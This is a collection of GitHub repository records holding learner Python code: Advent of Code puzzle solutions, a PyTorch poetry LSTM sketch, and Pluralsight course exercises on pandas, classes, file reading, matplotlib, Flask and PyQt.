combination\n result = computer(input_ints)[0]\n print(result)\n if result == 19690720:\n print('result found!')\n print(result)\n print(f'noun = {noun}, verb = {verb}')\n return (noun, verb)\n verb += 1\n noun += 1\n\n# this is like the main method!\nif __name__ == \"__main__\":\n with open('day2input.txt') as f:\n raw_input = f.read()\n input_strings = raw_input.split(',')\n # part 1\n # input_ints[1] = 12\n # input_ints[2] = 2\n # print(computer(input_ints))\n\n # part 2\n print(find_result(input_strings))\n \n" }, { "alpha_fraction": 0.5766209959983826, "alphanum_fraction": 0.5844748616218567, "avg_line_length": 31.577381134033203, "blob_id": "6ff198bef9582ff7a288570f904a040d1b87f22a", "content_id": "9c0d6306d1917f5119b5345be253e0f9114c73ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5475, "license_type": "no_license", "max_line_length": 159, "num_lines": 168, "path": "/day18.py", "repo_name": "erchiggins/advent-of-code", "src_encoding": "UTF-8", "text": "# directions key for neighbor discovery\n# NORTH = (-1, 0)\n# SOUTH = ( 1 0)\n# EAST = ( 0, 1)\n# WEST = ( 0, -1)\n\n# returns tuple of N/S/E/W neighbor if it exists\n\n\ndef get_neighbor(pos, direction, height, width):\n r = pos[0]\n c = pos[1]\n if direction == \"NORTH\" and r > 0:\n return (r - 1, c)\n if direction == \"SOUTH\" and r < height - 1:\n return (r+1, c)\n if direction == \"EAST\" and c < width - 1:\n return (r, c+1)\n if direction == \"WEST\" and c > 0:\n 
return (r, c-1)\n return None\n\n\ndef build_distances():\n \"\"\"\n should take\n * the map\n * current position\n * visited\n\n returns\n a tree\n \"\"\"\n pass\n\n\ndef flood_from(map, starting_pos):\n \"\"\"\n takes a starting position, and returns\n a dictionary of of the distances to all the\n other values (keys and doors) in the maze.\n eg\n {\"a\": (3,'ADF'), {dist:3, keys:'} ...}\n we can have\n keys\n doors\n empty\n wall\n \"\"\"\n to_visit = [(starting_pos, 0, \"\")]\n visited = set()\n distances = {}\n height = len(map)\n width = len(map[0])\n while to_visit:\n # grab next space to visit\n (position, distance_travelled, doors) = to_visit.pop()\n # check all its neighbors\n for direction in [\"NORTH\", \"SOUTH\", \"EAST\", \"WEST\"]:\n neigh = get_neighbor(position, direction, height, width)\n if neigh and (neigh not in visited):\n # neighbor exists and has not been explored\n val = map[neigh[0]][neigh[1]]\n if is_key(val):\n # found a key to add to the distances dict\n distances[val] = {'dist':distance_travelled + 1, 'behind': doors}\n if is_not_wall(val):\n if is_door(val):\n to_visit.append((neigh, distance_travelled + 1, doors+val,))\n else:\n to_visit.append((neigh, distance_travelled + 1, doors,))\n visited.add(position)\n return distances\n\ndef is_not_wall(val):\n return val != '#'\n\ndef is_key(val):\n return val.isalpha() and val.islower()\n\ndef is_door(val):\n return val.isalpha() and val.isupper()\n\ndef find_doors_and_keys(map):\n \"\"\"returns a dictionary of {'A': (r,c), ...} indexes\n of all the places in the map that are\n a door or a key.\n \"\"\"\n results = {}\n for row_idx, row in enumerate(map):\n for col_idx, col in enumerate(row):\n if is_key(col) or is_door(col):\n results[col] = (row_idx, col_idx)\n return results\n\ndef is_accessible(behind, keys):\n \"\"\" returns whether all keys to open doors in 'behind' string\n have been obtained \n keys is a list representing keys obtained so far\n \"\"\"\n return all([door.lower() in keys for door in behind])\n\n# keys is which keys have been obtains so far\ndef find_accessible(distances, current_pos, keys):\n options = distances[current_pos]\n # filter out options which are behind no doors, or doors for which we have keys\n # accessible = []\n # for key, details in options.items():\n # if is_accessible(details['behind'], keys):\n # accessible.append(key)\n return [key for key,details in options.items() \n if is_accessible(details['behind'], keys)]\n\ndef find_shortest_path(distances, num_keys):\n best_distance =10000000000000\n best_path = []\n paths_to_explore = [('@', [], 0)]\n while paths_to_explore:\n current_pos, keys_collected, distance_travelled = paths_to_explore.pop()\n print(f\"got all the keys with travelled {distance_travelled}, path was {keys_collected}. 
We have {len(keys_collected)} keys and want {num_keys} keys.\")\n if len(keys_collected) == num_keys:\n if distance_travelled < best_distance:\n best_distance = distance_travelled\n best_path = keys_collected\n options = [option for option in find_accessible(distances, current_pos, keys_collected) if option not in keys_collected]\n for option in options:\n # look up distance to key which is option\n # print(distances[current_pos])\n dist_to_key = distances[current_pos][option]['dist']\n paths_to_explore.append((option, keys_collected+[option], distance_travelled+dist_to_key))\n return best_path\n\n\n# create map and find starting position\n# map_strings = \"\"\"#########\n# #[email protected]#\n# #########\"\"\".split('\\n')\ninput = \"\"\"########################\n#...............b.C.D.f#\n#.######################\n#[email protected]#\n########################\"\"\"\nmap_strings = input.split('\\n')\nprint(input)\nmap = [list(s) for s in map_strings]\nheight = len(map)\nwidth = len(map[0])\nfor row_idx, row in enumerate(map):\n if '@' in row:\n col_idx = row.index('@')\n starting_pos = (row_idx, col_idx)\nprint(f'Starting position is {starting_pos}')\n\ndaks = find_doors_and_keys(map)\n\n# create dict of distances from every key/door to every other key/door\n# first entry is starting position @\ndistances = {'@': flood_from(map, starting_pos)}\n# add all other keys and doors' data to distances\nfor dak, position in daks.items():\n # print(f\"{dak} is at position {position}\")\n distances[dak] = flood_from(map, position)\n# print(distances)\nprint(distances.keys())\nnum_keys = len([key for key in distances.keys() if is_key(key)])\nprint(num_keys)\n# print(find_accessible(distances, 'f', ''))\nprint(find_shortest_path(distances, num_keys))\n\n\n" }, { "alpha_fraction": 0.5212038159370422, "alphanum_fraction": 0.5307797789573669, "avg_line_length": 27.038461685180664, "blob_id": "96760dd5d7d730b7084f02264dd4520d9669b17c", "content_id": "977a88e456199f3c78e0b66af389daf62e37fa4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 731, "license_type": "no_license", "max_line_length": 65, "num_lines": 26, "path": "/day1.py", "repo_name": "erchiggins/advent-of-code", "src_encoding": "UTF-8", "text": "def calc_fuel(mass):\n fuel = mass//3 - 2\n print(f'initial fuel: {fuel}')\n to_offset = fuel\n while True:\n offset = to_offset//3 - 2\n print(f'calculated offset: {offset}')\n if offset <= 0:\n break\n else:\n fuel += offset\n to_offset = offset\n return fuel\n\nif __name__ == '__main__':\n with open('day1input.txt') as f:\n raw_input = f.read()\n module_mass_str = raw_input.split('\\n')\n for mms in module_mass_str:\n if mms == '':\n module_mass_str.remove('')\n module_mass_num = [int(module) for module in module_mass_str]\n fuel_sum = 0\n for mass in module_mass_num:\n fuel_sum += calc_fuel(mass)\n print(fuel_sum)\n\n\n" } ]
4
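day3.py above stops after splitting the two wire paths, but its comment block already spells out the intended algorithm: trace each path as a set of coordinate tuples, intersect the sets, and take the minimum distance. One way to complete that sketch, using the sample paths from the Advent of Code puzzle statement rather than the repo's input file:

```python
def trace(path):
    # Walk one wire, recording every grid point it covers as an (x, y) tuple.
    steps = {'R': (1, 0), 'L': (-1, 0), 'U': (0, 1), 'D': (0, -1)}
    x = y = 0
    points = set()
    for segment in path:
        dx, dy = steps[segment[0]]
        for _ in range(int(segment[1:])):
            x, y = x + dx, y + dy
            points.add((x, y))
    return points

wire_0 = "R8,U5,L5,D3".split(',')
wire_1 = "U7,R6,D4,L4".split(',')
crossings = trace(wire_0) & trace(wire_1)
# Manhattan distance of the crossing closest to the central port.
print(min(abs(x) + abs(y) for x, y in crossings))  # -> 6
```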
rzxdczt/git-demo
https://github.com/rzxdczt/git-demo
6ba39aa741c226ae86cef5f3e6a90e167683549f
9ac5b979a963fd75e435e9d5477687e68fb6858d
90c7d66bcbc38f503689cff1fdb6cc0775cc0ed8
refs/heads/master
2020-06-05T02:41:39.101373
2019-06-19T02:53:13
2019-06-19T02:53:13
192,286,411
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6393442749977112, "alphanum_fraction": 0.6442623138427734, "avg_line_length": 35.882354736328125, "blob_id": "c20e09a25a07fb89724935cc52be81b4f25a207f", "content_id": "b119ffaeefc28bb9284e4e7563aa52fc5e065268", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 610, "license_type": "no_license", "max_line_length": 90, "num_lines": 17, "path": "/model.py", "repo_name": "rzxdczt/git-demo", "src_encoding": "UTF-8", "text": "#coding:utf8\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass PoetryModel(nn.Module):\n    def __init__(self, vocab_size, embedding_dim, hidden_dim):\n        super(PoetryModel, self).__init__()\n        self.hidden_dim = hidden_dim\n        # renamed from self.embedding_dim: this attribute holds the layer, not a size\n        self.embeddings = nn.Embedding(vocab_size, embedding_dim)\n        # 'batch_ = True' was not a valid nn.LSTM argument; inputs stay (seq_len, batch)\n        self.lstm = nn.LSTM(embedding_dim, self.hidden_dim, num_layers=2)\n        self.linear1 = nn.Linear(self.hidden_dim, vocab_size)\n\n    def forward(self, input, hidden=None):\n        seq_len, batch_size = input.size()  # fixed typo: was input.zise()\n        if hidden is None:\n            # zero-initialise hidden and cell states for the 2-layer LSTM\n            h_0 = input.data.new(2, batch_size, self.hidden_dim).fill_(0).float()\n            c_0 = input.data.new(2, batch_size, self.hidden_dim).fill_(0).float()\n        else:\n            h_0, c_0 = hidden\n        embeds = self.embeddings(input)\n        output, hidden = self.lstm(embeds, (h_0, c_0))\n        output = self.linear1(output.view(seq_len * batch_size, -1))\n        return output, hidden\n" }, { "alpha_fraction": 0.7272727489471436, "alphanum_fraction": 0.7386363744735718, "avg_line_length": 21, "blob_id": "eb309d673ad19d9659080224b74104f1ae138d00", "content_id": "8d20896878d0353481ab1b68bfbce5ce68d55bc1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 29, "num_lines": 4, "path": "/main.py", "repo_name": "rzxdczt/git-demo", "src_encoding": "UTF-8", "text": "# Scratch file for the git branching exercise; the lines below record\n# edits made on different branches, kept as comments so the file\n# stays valid Python.\n# I was changed in dev1 branch.\n# I was changed in dev.\n# job from boss.\n# let us add one line.\n" } ]
2
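Assuming the corrected forward pass above (zero-initialised state, logits reshaped to one row per position), a quick smoke test for the PoetryModel skeleton might look like this. Every size here is hypothetical (the repo pins none of them), and `from model import PoetryModel` assumes the script runs next to model.py.

```python
import torch
from model import PoetryModel  # assumes model.py from this repo is importable

vocab_size, embedding_dim, hidden_dim = 8000, 128, 256  # made-up sizes
net = PoetryModel(vocab_size, embedding_dim, hidden_dim)

# The LSTM is not batch_first, so the input is (seq_len, batch_size) of token ids.
tokens = torch.randint(0, vocab_size, (48, 16))
output, hidden = net(tokens)
print(output.shape)  # torch.Size([768, 8000]): one logit row per (position, batch) pair
```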
jalgalvis/Pluralsight
https://github.com/jalgalvis/Pluralsight
a135a4e465cdd9ad94b0de88ec7ea563e48467cd
6808926bd5e636bd1e66045b8b8cf90473d21378
54e67794f59eb83d6bbbfe28a62e4347b8100584
refs/heads/main
2023-02-08T05:19:15.978297
2020-12-30T22:51:17
2020-12-30T22:51:17
325,661,820
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6019678115844727, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 20.09433937072754, "blob_id": "4bcce21c4c5e97ccfabd4cc863a568465af7cdbd", "content_id": "7f483ded14ecf96846b783983f472db612004b15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1118, "license_type": "no_license", "max_line_length": 64, "num_lines": 53, "path": "/Python-Libraries/materials/pandas-fundamentals/demos/m3/demo.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport pandas as pd\nimport os\n\n# Let's load the data for the first time\ndf = pd.read_pickle(os.path.join('..', 'data_frame.pickle'))\n\n# Demo 1\ndf.artist\nartists = df['artist']\npd.unique(artists)\nlen(pd.unique(artists))\n\n# Demo 2\ns = df['artist'] == 'Bacon, Francis'\ns.value_counts()\n \n# Other way\nartist_counts = df['artist'].value_counts()\nartist_counts['Bacon, Francis']\n\n# Demo 3\ndf.loc[1035, 'artist']\ndf.iloc[0, 0]\ndf.iloc[0, :]\ndf.iloc[0:2, 0:2]\n\n# Try multiplication\ndf['height'] * df['width']\ndf['width'].sort_values().head()\ndf['width'].sort_values().tail()\n\n# Try to convert\npd.to_numeric(df['width'])\n\n# Force NaNs \npd.to_numeric(df['width'], errors='coerce')\ndf.loc[:, 'width'] = pd.to_numeric(df['width'], errors='coerce')\n\npd.to_numeric(df['height'], errors='coerce')\ndf.loc[:, 'height'] = pd.to_numeric(df['height'],\n errors='coerce')\n\ndf['height'] * df['width']\ndf['units'].value_counts()\n\n# Assign - create new columns with size\narea = df['height'] * df['width']\ndf = df.assign(area=area)\n\ndf['area'].max()\ndf['area'].idxmax()\ndf.loc[df['area'].idxmax(), :]\n" }, { "alpha_fraction": 0.6614999771118164, "alphanum_fraction": 0.6834999918937683, "avg_line_length": 31.770492553710938, "blob_id": "fb4f3938de11e4ab3bc64c3a30f15093823cf0be", "content_id": "dac22f82ad8730e512758dbdc5428b1cba1ae198", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2000, "license_type": "no_license", "max_line_length": 96, "num_lines": 61, "path": "/Core-Python/classExamples.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "\"\"\"Model for aircraft flights\"\"\"\n\n\nclass ClassTest:\n\n def instanceMethod(self):\n return \"0001\"\n\n\nclass ClassTest1:\n\n def __init__(self, instanceAttribute):\n self._instanceAttribute = instanceAttribute\n\n def instanceMethod(self):\n return self._instanceAttribute\n\n\nclass ClassTest2:\n\n def __init__(self, instanceAttribute):\n if not instanceAttribute[:2].isalpha():\n raise ValueError(f\"Not 2 initial letters in '{instanceAttribute}'\")\n if not instanceAttribute[:2].isupper():\n raise ValueError(f\"Not 2 initial Upper letters in '{instanceAttribute}'\")\n if not [instanceAttribute[2:].isdigit() and int(instanceAttribute[2:]) <= 9999]:\n raise ValueError(f\"Invalid number in '{instanceAttribute}'\")\n\n self._instanceAttribute = instanceAttribute\n\n def instanceMethod(self):\n return self._instanceAttribute\n\n def instanceMethodPartial(self):\n return self._instanceAttribute[:2]\n\n\nclass ClassTest3:\n\n def __init__(self, instanceAttribute):\n if not instanceAttribute[:2].isalpha():\n raise ValueError(f\"Not 2 initial letters in '{instanceAttribute}'\")\n if not instanceAttribute[:2].isupper():\n raise ValueError(f\"Not 2 initial Upper letters in '{instanceAttribute}'\")\n if not [instanceAttribute[2:].isdigit() and int(instanceAttribute[2:]) <= 9999]:\n 
raise ValueError(f\"Invalid number in '{instanceAttribute}'\")\n\n self._instanceAttribute = instanceAttribute\n\n\nclass ClassTest4:\n def __init__(self, instanceAttribute1, instanceAttribute2, instanceAttribute3):\n self._instanceAttribute1 = instanceAttribute1\n self._instanceAttribute2 = instanceAttribute2\n self._instanceAttribute3 = instanceAttribute3\n\n def instanceAttribute1(self):\n return self._instanceAttribute1\n\n def instanceAttribute4(self):\n return range(1, self._instanceAttribute2), \"ABCDFGKLMNOPQRST\"[:self._instanceAttribute3]\n\n" }, { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 26, "blob_id": "44df617bd021eebf514eeeb4a8c4beca6207b0b2", "content_id": "cafe4364cbc4e62a268d0d7a822a05f15432d95c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 54, "license_type": "no_license", "max_line_length": 39, "num_lines": 2, "path": "/README.md", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "# Pluralsight\n Materials for courses from Pluralsight\n" }, { "alpha_fraction": 0.8235294222831726, "alphanum_fraction": 0.8823529481887817, "avg_line_length": 34, "blob_id": "74c1bceb34d0096aa0a3180a35c3701c62e9b4e0", "content_id": "a4bf82b7221b7cbe9b3453d9a0b21000d7a468df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34, "license_type": "no_license", "max_line_length": 34, "num_lines": 1, "path": "/Python-Beyond-The-Basics/reader1/__init__.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "from reader1.reader1 import Reader" }, { "alpha_fraction": 0.7562500238418579, "alphanum_fraction": 0.78125, "avg_line_length": 52.66666793823242, "blob_id": "fbaf80ff98ecc7b9dc6ac8304613855e43a14eb7", "content_id": "b6bc735c752e7d524498a5b1ccc4cf2b105c1e4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 160, "license_type": "no_license", "max_line_length": 60, "num_lines": 3, "path": "/Python-Beyond-The-Basics/reader2/reader2/compressed/__init__.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "from reader2.compressed.bzipped import opener as bz2_opener\nfrom reader2.compressed.gzipped import opener as gzip_opener\n__all__ = ['bz2_opener', 'gzip_opener']" }, { "alpha_fraction": 0.6350092887878418, "alphanum_fraction": 0.666201114654541, "avg_line_length": 33.11111068725586, "blob_id": "55362a94b2c454506764bc86455dd709e4ca5452", "content_id": "5190e06bc44a0b430a99493aa149ada7c815ece8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2148, "license_type": "no_license", "max_line_length": 102, "num_lines": 63, "path": "/Matplotlib/pluralsigth-slides/07/demos/07/m07-04/app.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "import sys\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow, QLabel, QWidget, QComboBox\nfrom PyQt5.QtCore import QSize, QRect \n\nimport numpy as np\n\nfrom matplotlib.figure import Figure \nfrom matplotlib.backends.qt_compat import QtCore, QtWidgets, QtGui\nfrom matplotlib.backends.backend_qt5agg import FigureCanvas, NavigationToolbar2QT as NavigationToolbar\n\nimport helper\n\nclass MPLDemoWindow(QMainWindow):\n def __init__(self):\n QMainWindow.__init__(self)\n\n self.setMinimumSize(QSize(800, 600)) \n self.setWindowTitle(\"Matplotlib Demo\") \n\n centralWidget = 
QWidget(self) \n self.setCentralWidget(centralWidget)\n\n layout = QtWidgets.QVBoxLayout(centralWidget)\n layout.setGeometry(QRect(80, 20, 640, 480))\n\n self.canvas = FigureCanvas(Figure(figsize=(6, 4)))\n layout.addWidget(self.canvas)\n\n self.ax = self.canvas.figure.subplots()\n year = 2013\n heights = [month[1] for month in helper.precip_sums_for_year(year)]\n self.ax.bar(np.arange(len(heights)), heights)\n self.ax.set_xticks(np.arange(len(helper.MONTHS)))\n self.ax.set_xticklabels(helper.MONTHS)\n\n self.yearsBox = QComboBox(centralWidget)\n self.yearsBox.setGeometry(QRect(40, 560, 720, 31))\n self.yearsBox.setObjectName((\"yearsBox\"))\n self.yearsBox.addItem(\"2013\")\n self.yearsBox.addItem(\"2014\")\n self.yearsBox.addItem(\"2015\")\n self.yearsBox.addItem(\"2016\")\n self.yearsBox.addItem(\"2017\")\n self.yearsBox.addItem(\"2018\")\n\n\n self.yearsBox.currentIndexChanged.connect(self.show_precip_for_year)\n\n def show_precip_for_year(self, i):\n year = 2013 + i\n heights = [month[1] for month in helper.precip_sums_for_year(year)]\n self.ax.clear()\n self.ax.bar(np.arange(len(heights)), heights)\n self.ax.set_xticks(np.arange(len(helper.MONTHS)))\n self.ax.set_xticklabels(helper.MONTHS)\n self.canvas.draw()\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n mainWin = MPLDemoWindow()\n mainWin.show()\n sys.exit( app.exec_() )" }, { "alpha_fraction": 0.774193525314331, "alphanum_fraction": 0.774193525314331, "avg_line_length": 30, "blob_id": "83e8102b8deca771a47c26fdec3e6f4cecadb2cf", "content_id": "bf2762c1c2b493ef7eee1081210a7e6f963a052f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 62, "license_type": "no_license", "max_line_length": 31, "num_lines": 2, "path": "/Matplotlib/pluralsigth-slides/07/demos/07/m07-02/login.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "USERNAME='your-plotly-username'\nAPI_KEY='your-plotly-api-key'\n" }, { "alpha_fraction": 0.5525113940238953, "alphanum_fraction": 0.5525113940238953, "avg_line_length": 21, "blob_id": "7b77cf0edb0a16b55288ac8788010e6dd91f30d8", "content_id": "beeaf906759c55c6aa369d84f572ff6f821e828f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 219, "license_type": "no_license", "max_line_length": 42, "num_lines": 10, "path": "/Python-Beyond-The-Basics/reader/reader.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "class Reader:\n def __init__(self, filename):\n self._filename = filename\n self.f = open(filename, mode='rt')\n\n def close(self):\n self.f.close()\n\n def read(self):\n return self.f.read()" }, { "alpha_fraction": 0.7326732873916626, "alphanum_fraction": 0.735973596572876, "avg_line_length": 17.9375, "blob_id": "d067d1d827cf987936d19244ef5e4770503928c0", "content_id": "baf7be2f67891f12877c37ca849e45fc7ca7711a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 303, "license_type": "no_license", "max_line_length": 63, "num_lines": 16, "path": "/Matplotlib/pluralsigth-slides/07/demos/07/m07-02/m07-02.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "import plotly.plotly as py \n\nimport login \n\npy.sign_in(login.USERNAME, login.API_KEY)\n\nimport numpy as np\nimport matplotlib.pyplot as plt \nimport helper\n\nheights = [month[1] for month in helper.precip_sums_for_year()]\n\nfig, ax = plt.subplots()\nax.bar(np.arange(len(heights)), 
heights)\n\npy.plot_mpl(fig)\n" }, { "alpha_fraction": 0.6057692170143127, "alphanum_fraction": 0.625, "avg_line_length": 20, "blob_id": "bc831919701210fb40ac16afc901907853ec59b0", "content_id": "6604ac9a72215facdba75efa7177bdedd163d131", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 104, "license_type": "no_license", "max_line_length": 52, "num_lines": 5, "path": "/Core-Python/files.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "import sys\nf = open(sys.argv[1], mode= 'rt', encoding= 'utf-8')\nfor line in f:\n print(line)\nf.close()" }, { "alpha_fraction": 0.626086950302124, "alphanum_fraction": 0.643478274345398, "avg_line_length": 22.200000762939453, "blob_id": "4f8ea8f705b2720bff613d6e282fd6937ef0b983", "content_id": "45e80b2b20afc2b4c102f20108722bd57c367062", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 115, "license_type": "no_license", "max_line_length": 52, "num_lines": 5, "path": "/Core-Python/files1.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "import sys\nf = open(sys.argv[1], mode= 'rt', encoding= 'utf-8')\nfor line in f:\n sys.stdout.write(line)\nf.close()" }, { "alpha_fraction": 0.5297619104385376, "alphanum_fraction": 0.5357142686843872, "avg_line_length": 25.15625, "blob_id": "6894157e638622a944718e32ea1d338a4598bc29", "content_id": "fc4b00bf64817f3733660be56074bc0f6c145658", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 840, "license_type": "no_license", "max_line_length": 53, "num_lines": 32, "path": "/Python-Libraries/materials/pandas-fundamentals/demos/m2/demo_1.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport pandas as pd\nimport os\n\n# Where our data lives\nCSV_PATH = os.path.join('..', 'collection-master',\n 'artwork_data.csv')\n\n# Read just 5 rows to see what's there\ndf = pd.read_csv(CSV_PATH, nrows=5)\n\n# Specify an Index\ndf = pd.read_csv(CSV_PATH, nrows=5,\n index_col='id')\n# Limit columns\ndf = pd.read_csv(CSV_PATH, nrows=5,\n index_col='id',\n usecols=['id', 'artist'])\n\n# All columns that we need\nCOLS_TO_USE = ['id', 'artist',\n 'title', 'medium', 'year',\n 'acquisitionYear', 'height',\n 'width', 'units']\n\n# Proper data loading\ndf = pd.read_csv(CSV_PATH,\n usecols=COLS_TO_USE,\n index_col='id')\n\n# Save for later\ndf.to_pickle(os.path.join('..', 'data_frame.pickle'))\n\n\n\n" }, { "alpha_fraction": 0.6545454263687134, "alphanum_fraction": 0.6753246784210205, "avg_line_length": 23.0625, "blob_id": "d36b22ba68f0cf9a394694cafbadafc1224c1c98", "content_id": "c3114059a5466b96dd22865850291678c9182f40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 770, "license_type": "no_license", "max_line_length": 76, "num_lines": 32, "path": "/Matplotlib/pluralsigth-slides/07/demos/07/m07-03/app.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "from io import BytesIO\nimport base64\n\nfrom flask import Flask, render_template, request\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport helper\n\napp = Flask(__name__)\n\[email protected]('/')\ndef index():\n year = int(request.args.get('year', 2013))\n heights = [month[1] for month in helper.precip_sums_for_year(year=year)]\n plt.bar(np.arange(len(heights)), heights)\n plt.xticks(ticks=np.arange(len(helper.MONTHS)), 
labels=helper.MONTHS)\n plt.title('Monthly Total Precipitation for {}'.format(year))\n\n buf = BytesIO()\n plt.savefig(buf, format='png')\n buf.seek(0)\n\n b64data = base64.b64encode(buf.getvalue()).decode()\n\n plt.close()\n\n return render_template('index.html', img=b64data)\n\nif __name__ == '__main__':\n app.run(debug=True)\n" }, { "alpha_fraction": 0.6367461681365967, "alphanum_fraction": 0.6381486654281616, "avg_line_length": 23.586206436157227, "blob_id": "c2155e2e513e41a4619da379e27cad5937d1c0ba", "content_id": "fdc7dc53b65f31675c5de484fbcad611ccf961b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 713, "license_type": "no_license", "max_line_length": 73, "num_lines": 29, "path": "/Core-Python/wordsHardCodedUrl.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "from urllib.request import urlopen\n\n\ndef fetch_words_HCU():\n story = urlopen('http://sixty-north.com/c/t.txt')\n story_words = []\n for line in story:\n line_words = line.decode('utf-8').split()\n for word in line_words:\n story_words.append(word)\n story.close()\n # in case the function is called from a module returns the list\n return story_words\n\n\ndef print_items_HCU(items):\n for item in items:\n print(item)\n\n\ndef main():\n words = fetch_words_HCU()\n print_items_HCU(words)\n\n\n# with the following statement we use __name__ to determine if the module\n# is called from another module or if it's being called as a script.\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6427807211875916, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 22.375, "blob_id": "8e1d15676248a2085d30d46c05c36f0e32ac52c9", "content_id": "d9864118168b495ec75a40eb40d74851044957d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 935, "license_type": "no_license", "max_line_length": 73, "num_lines": 40, "path": "/Core-Python/words.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python3\n\"\"\"Retrieve and print words from a URL\"\"\"\n\nimport sys\nfrom urllib.request import urlopen\n\n\ndef fetch_words(url):\n \"\"\"Fetch a list of words from a URL\n\n :param url: The URL of UTF-8 text document.\n :return: A list of strings containing the words from the document\n \"\"\"\n\n story = urlopen(url)\n story_words = []\n for line in story:\n line_words = line.decode('utf-8').split()\n for word in line_words:\n story_words.append(word)\n story.close()\n # in case the function is called from a module returns the list\n return story_words\n\n\ndef print_items(items):\n for item in items:\n print(item)\n\n\ndef main(url):\n words = fetch_words(url)\n print_items(words)\n\n\n# with the following statement we use __name__ to determine if the module\n# is called from another module or if it's being called as a script.\n\nif __name__ == '__main__':\n main(sys.argv[1])\n" }, { "alpha_fraction": 0.8235294222831726, "alphanum_fraction": 0.8823529481887817, "avg_line_length": 34, "blob_id": "19a8efb726e4c30a809aaeb64936192fcafd54bb", "content_id": "b7a969ca714a4e4c88af4bbc1e712a45677a75f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34, "license_type": "no_license", "max_line_length": 34, "num_lines": 1, "path": "/Python-Beyond-The-Basics/reader2/reader2/__init__.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "from reader2.reader2 import Reader" } ]
16
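The pandas demo in demos/m3/demo.py leans on two idioms worth isolating: coercing dirty string columns with `pd.to_numeric(errors='coerce')` and deriving a new column with `assign`. Here is the same pattern on a toy frame, since the Tate artwork CSV that the demo loads is not part of this dump.

```python
import pandas as pd

# Toy stand-in for the artwork data; 'n/a' and 'x' mimic the dirty height/width strings.
df = pd.DataFrame({'height': ['10', '20', 'n/a'],
                   'width': ['5', 'x', '8']})

# Bad entries become NaN instead of raising, exactly as in the demo's coercion step.
df['height'] = pd.to_numeric(df['height'], errors='coerce')
df['width'] = pd.to_numeric(df['width'], errors='coerce')

# assign returns a new frame with the derived column, leaving the original intact.
df = df.assign(area=df['height'] * df['width'])
print(df)
print(df['area'].idxmax())  # index label of the largest computed area -> 0
```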
JimBae/ShotgunUtils
https://github.com/JimBae/ShotgunUtils
9324abaea91a14d0121281c1b20ecaa9003d8b6f
2e88f7144da96719021627c90e02a83b7ebe9f48
b52333da2763a7d812ddea729bde8378cd7e23d6
refs/heads/master
2018-05-13T11:47:50.305445
2017-05-28T09:40:54
2017-05-28T09:40:54
null
0
0
null
null
null
null
null
